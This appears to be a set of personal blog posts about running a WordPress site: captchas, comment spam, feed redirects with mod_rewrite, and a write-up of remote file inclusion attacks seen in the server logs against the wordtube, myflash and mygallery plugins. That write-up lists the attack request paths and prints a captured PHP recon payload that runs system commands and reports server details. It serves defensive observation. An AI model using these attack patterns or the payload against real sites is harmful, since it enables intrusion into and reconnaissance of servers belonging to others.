Static in the Ether

With the comment spam continuing to pour in I caved in a and implemented captchas for comments.  While a solution using mathematical computation such as that offered by the match captcha plugin for wordpress, since the are only host defendant (rather than having to rely on some other 3rd-party service), this particular plugin was only certified to 2.3.1, and I could not get a working download.  I capitulated to the web 2.0 way and installed WP-recaptcha, which provides a nice wrapper around the recaptcha.net service.

Installation was simple, with registration required in order to obtain two APi keys for use with the service. What interesting about this solution is that rather than just mutating words, a two phrase system is sued. One of the phrases is a known word, and th eother is a word that is taken form a ocr scan of the NYT or Internet Archive, ans has not been correctly identified by the ocr software. Thus there is a bit of community mindedness involved as well, as these words are interpreted. More on the gory details can be found here.

What does interest me tho is that this will not offer any protection from ‘pingback’ spam whihc is being submitted via the xmlrpc interface, but should still at another layer to the security onion.

The last few weeks has seen a deluge of comment spam, which mostly is the run of the mill bot based stuff advertising ‘cheap hosting’ , porn and other such sites.  a couple tht cought my attention were simple posts of urls with the following sort of format:

• http://www.google.com/search?q=rxbcrobh
• http://www.google.com/search?q=frhlrxca
• http://www.google.com/search?q=omihinga

Searching on google with these links, surprisingly turns up nothing. I was expecting to find lists of malware infected sites similar to the SQL injection attacks seen in the last few months. Does anyone have any insight into these ? Sources appear to be geographically dispersed, and scattered across a variety of blog entries, old and new?

Further to my previous post about using mod_rewrite to direct my old feed URLs to the right place, its probably time to notify people who read them in aggregators that the URI has changed, since the aggregators (particularly the web based ones hide the redirect, even tho its a 301). To the:

• 1 subscribers using Google FeedFetcher to grab /blog/index.php?flav=rss
• 6 subscribers using Google FeedFetcher to grab /blog/?flav=rss&category=Security
• 27 subscribers using Google FeedFetcher to grab /blog/?flav=rss
• 2 subscribers using Rojo to fetch /blog/?flav=rss
• 7 subscribers NewsGatorOnline to grab /blog/?flav=rss
• 1 subscriber using Feedshow to grab /blog/?flav=rss

First of all thank-you for your interest, but the links have changed. My full feed is available as RSS 2.0 or Atom 1.0, or a reduced Security only feed as RSS 2.0 ( but you miss out on the fun stuff).

This is why this post is actually tagged as security, so they get it too ;)

The other day morning stated out with a conversation with darb that went as follows:

DARB: so…wordpress hey?
BVI: I got over writing my own code
BVI: now I’m waiting for my blog to be 0wn3d
DARB: you know wordpress is the equivalent of an 8ft tall ogre that stands outside looking pretty, smashes tables when he tries to sit down, and needs 20kg of food every day…and offers little or no protection on the side entrance to your establishment?
BVI: exactly!
DARB: lolz
BVI: mine has a spiked collar and a beware of the ogre sign :-)
DARB: that only scares away legitimate users…bandits read that sign as “come on in, we left the side door open”
BVI: yeah
DARB: I love wordpress docs and plugins
DARB: “just chown your /tmp file, and then chmod 777 everything”

Well not 20 minutes later I noticed a number of Remote file inclusion attacks coming in. Nothing like the ogre having sent out an invite to all and sundry. Attacks were coming looking as follows:

• /blog/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/archives/5/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/archives/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/?flav=rss/wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /blog/wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /blog/archives/14/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo
• /blog/archives/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo
• /blog/archives/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo

In the above the actual path for the exploit codes been replaced with foo, but is of the form of http://site/somepath/tx.txt????, or similar.

Ive now seen this form over eighty different systems. The include file seems to vary ( see below) but the same plugins are being targeted. No real surprise as they have been known exploitable for a while.

• myflash < v1.1 01 May 2007 ISS-XForce
• wordtube < 1.43 01 May 2007 ISS X-Force
• mygallery ≤ v 1.2.1 29 April 2007 ISS-X-force FRsirt

All the requests were may using libwww-perl/5.810, so most likely come from compromised unix systems. the payload file being referred to has been removed, but I found some others, which are no doubt similar. The algorithm being used for the brute forcing is rather dumb. of the entries listed above, only two relate to viable targets for my given install. I found the request for “blog/?flav=rss/….” rather amusing. Another interesting observation is the number of requests centered around http://lair.moria.org/blog/archives/14 my post relating to Windows XP failing to hibernate. I have yet to see hits on any other particular posts.

Looking at the payload code form some of the other similar attacks, I found the following one interesting, as a more human driven recon script providing information for making a value judgment on the target site rather than an automated assault. (When will these people learn that StudlyCaps isn’t really that cool )

echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo “os: $os<br>”;
echo “uname -a: $alb<br>”;
echo “uptime: $alb2<br>”;
echo “id: $alb3<br>”;
echo “pwd: $alb4<br>”;
echo “user: $alb9<br>”;
echo “phpv: $alb6<br>”;
echo “SoftWare: $alb5<br>”;
echo “ServerName: $alb7<br>”;
echo “ServerAddr: $alb8<br>”;
echo “NigeriaN HackerS TeaM<br>”;

Others are not quite so benign, providing command shells, and in some cases drive by exploits using a number of different tools to try download further payloads onto the system or upload password files, webserver configurations and other sensitive information. c99madscript.php really seems to be the flavour of the month with these, although it has been around a while.

What all these attempts that Ive seen do have in common are the trailing “???” or “?????” irrespective of the payload contents of filename. The purpose of these to me is unclear, surely its a pain to type. Is it a bug ina script, or are people trying to do something else.

Having now migrated to Wordpress from my own very customised version of phpBloxsom, which ran the previous incarnation of this blog, Ive been left with the issue of dealing with all the sites pulling my RSS feeds. With the change of software has come a change of url for the location of the feeds.

Apache’s mod_rewrite seems to be the obvious candidate for making this as transparent as possible. In essence what needed to happen was incoming requests for:

"GET /blog/?flav=rss&category=Security HTTP/1.0" and
"GET /blog/?flav=rss HTTP/1.0" respectively need to be converted into:


http://lair.moria.org/blog/archives/category/security/feed

and

http://lair.moria.org/blog/feed respectively

This was achieved matching on the QUERY_STRING variable within apache. The real trick came trying to get the new URLS to appear clean. This proved to be more difficult than I expected. My initial rewrite rules resulted int he following:

"GET /blog/?flav=rss HTTP/1.0" 301 249 "
"GET /blog/feed/?flav=rss HTTP/1.0" 200 54274 ""

The agent was directed to the right url but it still looks ugly. Note the use of a HTTP/301 status code indicating permanently moved rather than a 302 which mod_redirect usually provides. The solution to the appending of the query string turned out to be to force my own null string onto the redirect. The Apache Wiki was where I finally found the right answer. so the way to remove a QUERY_STRING is to append a blank string “?” to the redirect .

The final setup in my .htaccess for Wordpress looks as follows:

RewriteCond %{QUERY_STRING} ^flav=rss$ [NC]
RewriteRule ^$ http://lair.moria.org/blog/feed? [R=301,L]
RewriteCond %{QUERY_STRING} ^flav=rss&(category)=Security$ [NC]
RewriteRule ^$ http://lair.moria.org/blog/archives/category/security/feed? [R=301,L]
RewriteCond %{QUERY_STRING} ^flav=atom$ [NC]
RewriteRule ^$ http://lair.moria.org/blog/feed/atom? [R=301,L]

Having a quiet evening at home is a fairly rare occurrence, but tonight it happened. Consequently I got so spent some quality time exploring the wealth of plugins available for Wordpress.  After some picking and choosing Ive added a couple, and as the title sugegsts they are “web 2.0″ - for varing definitions of the term that is.

My big concern is how much does the addition of such content actually slow down the loading of a page ? Something I’ll need to keep an eye on. Now if only I could get Slimbox to behave itself as advertised.